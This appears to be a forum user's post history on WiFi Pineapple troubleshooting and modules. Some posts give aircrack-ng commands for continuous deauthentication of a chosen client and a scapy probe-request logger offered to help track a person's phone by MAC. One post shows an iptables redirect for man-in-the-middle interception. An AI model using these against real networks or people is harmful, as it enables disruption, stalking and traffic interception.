esa
-
Posts
92 -
Joined
-
Last visited
Posts posted by esa
-
-
1 hour ago, ortizimo said:
no adapter found using ifconfig...no adapter found using airmon-ng. using kali.
So you SSH into WiFi Pineapple, ran ifconfig and did not find any adapter matching wlan1 or wlan1mon?
Can you post a screenshot of the results of ifconfig & iwconfig & iwlist.
-
7 hours ago, ortizimo said:
Its been a while and I've sent an email to Hak5 but haven't received a response. I've been busy and put it aside but tried it today and nothing. Now I dont get any shared connection and cannot log in into the pineapple. what a waste of my money.
Try to deauth for a longer duration. This will act as a DDOS and force the device to search for alternatives.
My advise is to use the console mode to do it.Wifi Pineapple wlan0 is your default AP, you should use wlan1 to perform the deauth.
After you ssh into Wifi Pineapple:
run code (1) to check whether wlan1 or wlan1mon exist.
If wlan1 exist, run (2) else run (3).
Code (2) merely enables monitoring mode for wlan1, it also renames it to wlan1mon.
Code (3) merely dumps out whatever wlan1mon can receive from WiFi, so you should see some APs and etc.
Next run (4) to perform deauth. You will need to configure the command accordingly to which MAC you are going to deauth. Use aireplay-ng -h to list the help. parameter -a & -c might be wrong do verify.
1) ifconfig 2) airmon-ng start wlan1 3) airodump-ng wlan1mon 4) aireplay-ng -0 0 -a xxxxxx -c xxxxx wlan1mon -
Just now, gixxa said:
Can't even delete modules now!
Come on guys, step up the mark, perhaps you should focus on getting the products you have already sold to customers in decent shape before turning your back on them to focus on bringing in more money with the next product.
Alternatively, if you dont provide after sales support could you provide me with a product thats stable out of the box.
I do face occasional issues when using the GUI and it usually can be solve either by a power reset or factory reset. Sometimes Recon scan will hang at 100%, other times PineAP will not work as intended.
Generally SSH into the device will offer a more reliable experience. Furthermore with the console mode you are able to debug what exactly is wrong.
Also when you are facing too many issues it could be that the firmware wasnt updated properly, thus a firmware recovery might come handy.
-
2
-
-
https://vidlox.tv/003o08meqxds
Looks safe to watch. Perform your own scan at virustotal or scanurl.
-
Added SSID tracking. Could just use this module.
-
8 hours ago, haze1434 said:
Thank you :)
I'm attempting to put together a simple script to test feasibility.
If one uses airodump-ng to start collecting data, is there a way to see which access points a mobile device has previously connected to?
I can see under the 'Probes' header that there are some devices showing SSIDs and some are simply showing 'unassociated'. Are the SSIDs shown under here the access points that a device has previously connected to? Does this work even when they are out of range of the SSID?
I'm thinking that, if the PI could work out which Access Point belongs to the target's home, then the script could monitor for any MACs that are probing for this SSID. Then, even if the MAC changes every few minutes, airodump-ng could still tell which mobile device is related to the target?
It is not a complete solution but it should work on a portion of your targets.
Yes ssid probe request is based on previous connected ssid and it works even when the real AP is not nearby.
You should get an iPhone and a cheap android phone to experiment with.
Do share your script if you have it.
-
10 minutes ago, haze1434 said:
If a PI were to run airodump-ng to see whether someone was at home then, it would work if they were connected to their home Wi-Fi, but if they weren't, then the station MAC would change every few minutes?
So, for example;
- Joe Bloggs is at home with his iOS device and connected to his Wi-Fi.
- PI Dave collects Joe's device MAC address using airodump-ng
- Joe Bloggs goes for a drive with his iOS device, with it's Wi-Fi still turned on, but no longer in range of his home Wi-Fi, so it's not associated.
- PI Dave follows, with airodump-ng still collecting MACs
In this scenario, would PI Dave's airodump still pick up Joe's iOS MAC, or would the MAC change within minutes and therefore not be recognised as the same device by airodump?
MAC address should change to a spoofed one as soon as it is disconnected from the real Wi-Fi network.
On the timing of the change, it seems randomised, there is no fixed interval that i observed.
More info.
There are also some articles which suggest that iOS MAC randomization could be defeated. But the catch is that you need to know his real MAC to begin with.
-
Btw is the 2 x 7dBi Panel Antennas worth it ? Thinking of a upgrade too. How effective is it for you ?
-
I am using a default Nano setup.
1) Interference caused by external environment at time of scan is beyond our control.
http://packetworks.net/blog/common-causes-of-wifi-interference
3) On iOS, tx probe changes very frequently within mins (no exact value). The only time it reveals it actual MAC is when it is connected to a AP.
4) Once again i do not have the stats, but you should expect to see this behaviour on most modern phones. Try it on Nexus or iPhone
another i forgotten to mention, I am also not certain if phones tx at consistence power. Too many factors.
-
Please experiment, maybe you have better luck than me.
My conclusion is that relying on WiFi probes from client device is not reliable and does not work for all cases.
Some challenges would be:
1) interference in signal resulting is fluctuating signal strength
2) Wifi probe times differs between devices & OS, the target might be long gone before his/her device tx again
3) IOS mac address randomisation & some Android OS/Phones
4) Power saving mode which turns off Wifi tx when screen is off
5) We are assuming the Wifi module is turned on
-
15 minutes ago, haze1434 said:
Hi all,
I was recently talking with someone regarding Private Investigator work, and the discussion included ways in which one could tell which direction a tailed vehicle/person had turned when you get to a junction and are not certain whether they turned left or right etc.
This has given me an idea regarding using the Station MAC of their mobile phone to determine which direction they went. Kind of like a poor-mans GSM Directional Finder, but using the target's WiFi signal instead of the actual phone signal.
I would like your thoughts on the following, whether you think this would be feasible, and possible best methods if it is.
- Minimum 2 x directional WiFi antennas in the PI vehicle, one facing forwards and left, one facing forwards and right.
- Beam widths set so that they are close to each other, but not actually crossing, at the front of the vehicle.
- A device (RPi / laptop) with both antennas connected.
- Both antennas in Monitor Mode, using airodump-ng to monitor nearby Station MACs.
- A script created on the device to read which antenna is picking up a Station MAC with a higher signal strength than the other, and then output this to a screen / phone.
Now, presuming the PI is able to get the mobile phone Station MAC of the person being investigated (not massively difficult) and the target has their phone WiFi on (happens often), in theory this method could make following them easier, as even without obvious sight of the vehicle/person ahead, the PI could have at least a rough idea of which direction they are in, in relation to their current position. It could perhaps also be possible to add more antennas, such as in each corner of the vehicle.
Would this work? I'm tempted to have a play.
Thanks.
#!/usr/bin/python import os import time import datetime import argparse import netaddr import sys import logging from scapy.all import * from pprint import pprint from logging.handlers import RotatingFileHandler from collections import OrderedDict NAME = 'probemon' DESCRIPTION = "a command line tool for logging 802.11 probe request frames" DEBUG = False myDict = {} def packet_callback(packet): if not packet.haslayer(Dot11): return # we are looking for management frames with a probe subtype # if neither match we are done here if packet.type != 0 or packet.subtype != 0x04: return # list of output fields fields = [] # append the mac address itself fields.append(packet.addr2) # parse mac address and look up the organization from the vendor octets #if mac_info: # try: # parsed_mac = netaddr.EUI(packet.addr2) # fields.append(parsed_mac.oui.registration().org) # except netaddr.core.NotRegisteredError, e: # fields.append('UNKNOWN') # include the SSID in the probe frame #if ssid: fields.append(packet.info) delimiter='\t' textkey = delimiter.join(fields) #if rssi: rssi_val = -(256-ord(packet.notdecoded[-2:-1])) fields.append(str(rssi_val)) # determine preferred time format log_time = str(int(time.time())) #if time_fmt == 'iso': log_time = datetime.datetime.now().isoformat() fields.append(log_time) # logger.info(delimiter.join(fields)) clear = lambda : os.system('tput reset') clear() myDict[textkey] = rssi_val, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), int(ord(packet[Dot11Elt:3].info)) mySortedDict = OrderedDict(sorted(myDict.items(), key=lambda t: t[0])) for i in mySortedDict: print myDict[i][0], myDict[i][1], myDict[i][2], i #sys.stdout.write('%s\n' % textkey) #sys.stdout.flush() def main(): parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument('-i', '--interface', help="capture interface") parser.add_argument('-t', '--time', default='iso', help="output time format (unix, iso)") parser.add_argument('-o', '--output', default='probemon.log', help="logging output location") parser.add_argument('-b', '--max-bytes', default=5000000, help="maximum log size in bytes before rotating") parser.add_argument('-c', '--max-backups', default=99999, help="maximum number of log files to keep") parser.add_argument('-d', '--delimiter', default='\t', help="output field delimiter") parser.add_argument('-f', '--mac-info', action='store_true', help="include MAC address manufacturer") parser.add_argument('-s', '--ssid', action='store_true', help="include probe SSID in output") parser.add_argument('-r', '--rssi', action='store_true', help="include rssi in output") parser.add_argument('-D', '--debug', action='store_true', help="enable debug output") parser.add_argument('-l', '--log', action='store_true', help="enable scrolling live view of the logfile") args = parser.parse_args() if not args.interface: print "error: capture interface not given, try --help" sys.exit(-1) DEBUG = args.debug # setup our rotating logger logger = logging.getLogger(NAME) logger.setLevel(logging.INFO) handler = RotatingFileHandler(args.output, maxBytes=args.max_bytes, backupCount=args.max_backups) logger.addHandler(handler) if args.log: logger.addHandler(logging.StreamHandler(sys.stdout)) #while True: # for channel in range(1, 14, 1): # os.system("iwconfig " + args.interface + " channel " + str(channel)) # print "[+] Sniffing on channel " + str(channel) sniff(iface=args.interface, prn=packet_callback, store=0) if __name__ == '__main__': main()might be useful.
-
Just a minor change between the base Recon module code on Tetra & Nano.
Thus i believe this should work for Tetra users.
As i do not have a Tetra, i gotta rely on those who have it to help try it.https://github.com/esa101/ReconPlus-Tetra
Have also updated the first post to include separate links to modules for Nano & Tetra.
-
1
-
-
5 hours ago, Zylla said:
I didn't have time for a diff, so i just upladed the entire module as an archive.
Recon_TETRA.rarThanks for helping to upload this and also helping to diff the network module in the other thread.
-
2 hours ago, b0N3z said:
I just put this on my Tetra and It wont allow for 5ghz scan. I entered an issue on the git page.
Hi i just assumed Tetra & Nano are sharing the same module. As i do not have a Tetra, is it possible to upload the Tetra's default Recon module.
I will do a code comparison and would likely be able to "fix" it if the changes is not too significant.
-
12 hours ago, GregBern said:
I'm having some trouble with the Tetra. I am using the 15.05 firmware and am able to view and download modules from the web interface. The problem I am running into is that the dependencies will not install. I click the install button and they hang for a few minutes and go back to showing that the dependencies have not installed. Modules I have tried include : Papers, SSLsplit, and Site Survey
I can SSH into the Tetra and ping google so I know it has internet access. I tried running "opkg update" but it reaches out to http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/Packages.gz. but hangs and does not update. Any help is much appreciated.
Try wget http://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/base/Packages.gz
And report ur observations
-
On 01/05/2017 at 8:12 AM, Sebkinne said:
Hi @esa,
I usually just use Sublime Text 3, but Atom is a pretty good free (and open source) alternative. They can both be setup to be very IDE like, but I have to admit they do not really get close to what Jetbrains has to offer.
Having used PHPStorm in the past, I still do most of my Pineapple coding in Sublime as most of the features PHPStorm offers are not too relevant here or are available via plugins in both Sublime and Atom. It does take some time to setup and configure the way you want it, but it's definitely worth it.
Thanks will give sublime text a try after my Jetbrain trial expires this weekend.
-
I have been using a trial version of JetBrains WebStorm for development of some Nano/Tetra modules. Unfortunately the trial is expiring & it is a costly product @129USD for a year's license.
Any modules developers can recommend something good that you are using?
Requires support for html, angularjs, python, php.
-
On 25/02/2017 at 10:28 PM, anode said:
Kinda minor, but on network page, an option to save AP names with a drop down.
And option to hide management SSID.
Was looking for the same function. Couldnt find it so i just modded the networking module instead. Surprisingly straightforward mod < 5 lines of codes.
Copy the files and replace the files in the original networking module. Do highlight if it works or there are any bugs.
https://github.com/esa101/NetworkingPlus
-
2 hours ago, b0N3z said:
tried it out after 4 1min scans it never game results. I have an android phone that is not connected to any AP also.
my bad there is a missing folder in my git upload. Please create a folder called "log" in the module's directory. It should work after that.
cd /pineapple/module/ReconPlus mkdir logFor others who intend to install in their sd card. transfer ReconPlus to /sd/modules/ReconPlus and remember to create the softlink.
ln -s /sd/modules/ReconPlus /pineapple/module/ReconPlus -
On 23/04/2017 at 4:12 AM, ev0lve said:
Hi. Good that this forum exists. ;) People with experience on here.
I am trying this in windows for a start. It's always some issues in the network in windows. ;) When i set up my pineapple for the first time, i had a VPN on. And i do not know if that made the pineapple to boot up and set up the wrong details in it or not?
If so, maybe i can try and do a factory reset.
Right now i got the pineapple set to 172.16.42.42
And has user sharing on my Ethernet settings.
But i cant get no internet when i load bulletins in pineapple. Another thing i'm curious about. If i theoretically let someone else use my internet through the pineapple and my internet. Can i use openVPN with that, so that they browse with a VPN ip. but i can still intercept everything normal? Does that work? If so how?
But first i need to get the internet working. Thanks allot.
edit: Also. Do i need to have both usb connections plugged in? If so, which i'm guessing, i can use windows. Was gonna use linux, but i use a usb stick, and i only have two usb ports on my laptop.
1) I can easily power my Nano without both usb connection plugged in. I connect it straight to my laptop.
2) It is a pain in the arse to get internet on Windows, somehow it always forget my settings.
a) Ensure that you have internet
b) connect your pineapple to your pc and wait till the blue led are solid or the portal is up
c) On your main internet interface->properties->sharing turn off internet sharing and wait 10 sec.
d) On the same tab select your pineapple interface and turn on internet sharing, wait 10 sec. Close tab by clicking ok.
e) On your pineapple interface -> properties -> networking select the IPv4 & enter the ip address 172.16.42.42/255.255.255.0.
f) Now you pineapple should have internet. Else disable your pineapple interface, enable it again and repeat steps (c) to (e)
-
4 minutes ago, mda1125 said:
At home, I plug in a USB dongle and use that to easily connect to my home AP. I can route any connected clients thru my Pineapple. Works great.
However, out and about, if I find Free WiFi that at least makes me input a password, it's golden! But many places like SBUX are "free" but ask the user to initially accept and connect.
That option doesn't seem to work via the WiFi Client Mode as there is no "password" to enter.
I could tether the device and have but that option negates the use of the USB for a 3rd radio.
I could use PortalAuth in combination with Evil Portal to at least attempt to capture I suspect.
1 solution. Use your phone to connect to SBUX wifi then "accept and connect" thru the phone's browser. Now that the phone has internet, turn on usb tethering and connect your pineapple to the phone using usb connection. Dun forget to download the wifi pineapple apk for easy access to your pineapple's management console.
**Dont think there is an easy solution to an offline captive portal. Good luck hf.
-
16 hours ago, Rawpower said:
powering: okay (via wall 220V outlet and transfer, not over USB ... ;-(
factory reset: done, but no improvement.
But I could further pinpoint the problem ...Only when I select 2,4 GHz recon (or both) they recon process hangs with 100% without results
AND
It happens only at my HOME-location, I tested myTetra-pineapp @my parents the recon-functions works normal ....
So question ... what @ my HOME can spoil the recon-function @2,4Ghz band?Any suggestions?
Many Thanks for your input !
Bart
this is strange, doesnt sound like a faulty hardware since you can get it to work occasionally. try this and report any errors faced:
1) restart your pineapple
2) ssh to it
3) Start wlan1 as monitor mode using airmon-ng
airmon-ng wlan1 start4) Perform airodump using your wlan1mon interface. you should expect to see some MAC addresses in your vicinity
airodump-ng wlan1mon5) This performs the same command as running recon on 2.4ghz for 1min. The results will be stored in /tmp/re
pinesniffer wlan1mon 60 1 /tmp/re6) Read /tmp/re, you should expect some results
cat /tmp/re -
On 21/04/2017 at 3:48 AM, M@s0n said:
Hi everyone,
I would like to use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/
So here's my setup,
MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine
: Pardon my diagram skills :(
Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal. Any feedback would be appreciated.
#!/bin/bash
if [[ $# -eq 0 ]] ; then
echo "Usage: $0 (enable|disable)"
exit 1
fiaction="$1"
case $action in
enable)
echo "Enabling ..."
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
#iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
iptables -t nat -A POSTROUTING -j MASQUERADE
;;
disable)
echo "Disabling ..."
iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
#iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
;;
*)
echo "Usage: $0 (enable|disable)"
exit 1
;;
esac
Can you elaborate why this setup is not ideal? If it is not working, try using 192.168.1.2 as the destination ip.
-
24 minutes ago, sbb said:
For the nano, which antenna would be best replace with a yagi antenna? I understand that one is used for sending and the other receiving but I am not sure which one actually does what in order to replace it.
Could anyone tell me which side of the nano a single yagi antenna would work best in?
Depends on your needs.
By default (using GUI) wlan0 is responsible for AP while wlan1 does sniffing and injection.
If you want to create a free rogue AP, then connect to wlan0. If you want to monitor/sniff then connect to wlan1.
If you want to deauth a device and force it to connect to your AP, then you will need both.
-
1
-
Adapter turns off after a click
in WiFi Pineapple NANO
Posted
If i get the issue, in your case using the web interface (GUI) will result in frequent shutdown of nano?
Some options:
1) Verify that there is enough power for the nano. Try different ways to power your device and see if that improves the stability
2)
Reset to factory default==> you have tried that but it didnt work out3) Recover the firmware to original then perform firmware upgrading.
Another advise, treat the OS as fragile. For each module that you install, ensure that the key features of nano still works before installing another module. Do use the shutdown button if possible.